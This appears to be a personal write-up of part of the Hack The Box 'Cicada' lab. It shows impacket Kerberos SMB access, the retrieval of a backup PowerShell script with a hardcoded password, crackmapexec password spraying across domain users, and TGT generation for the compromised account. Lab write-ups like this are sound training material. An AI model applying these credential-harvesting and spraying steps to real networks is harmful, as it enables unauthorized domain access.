InfoSec LAB

david.orelious Session

Using the TGT of the david.orelious user, I can authenticate to the target SMB server

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ KRB5CCNAME=david.orelious@cicada-dc.cicada.htb.ccache impacket-smbclient CICADA.HTB/david.orelious@cicada-dc.cicada.htb -no-pass -k -dc-ip $IP
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Type help for list of commands
#

Authenticated

# shares
ADMIN$
C$
DEV
HR
IPC$
NETLOGON
SYSVOL
# use DEV
# ls
drw-rw-rw-          0  Wed Aug 28 19:27:31 2024 .
drw-rw-rw-          0  Thu Mar 14 13:21:29 2024 ..
-rw-rw-rw-        601  Wed Aug 28 19:28:22 2024 Backup_script.ps1

There is a PowerShell script located in the //cicada-dc.cicada.htb/DEV share

Backup_script.ps1

# get Backup_script.ps1

Downloading the PowerShell script to Kali

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ cat Backup_script.ps1
 
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
 
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"

The Backup_script.ps1 file contains the CLEARTEXT credential of the emily.oscars user; Q!3@Lp#M6b*7t*Vt Another thing to note is that there is another drive; D:\

Validation

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ crackmapexec smb $IP -u users.txt -p 'Q!3@Lp#M6b*7t*Vt' --continue-on-success
SMB         10.129.41.192   445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\administrator:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\guest:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\cicada-dc$:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\john.smoulder:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\michael.wrightson:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [-] cicada.htb\david.orelious:Q!3@Lp#M6b*7t*Vt STATUS_LOGON_FAILURE 
SMB         10.129.41.192   445    CICADA-DC        [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt

Valid

┌──(kali㉿kali)-[~/archive/htb/labs/cicada]
└─$ impacket-getTGT 'CICADA.HTB/emily.oscars@cicada-dc.cicada.htb' -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: Q!3@Lp#M6b*7t*Vt
[*] Saving ticket in emily.oscars@cicada-dc.cicada.htb.ccache

TGT generated for the emily.oscars user

InfoSec LAB

Explorer

Cicada_SMB_david.orelious

david.orelious Session

Backup_script.ps1

Validation

Interactive Graph View

Table of Contents

Backlinks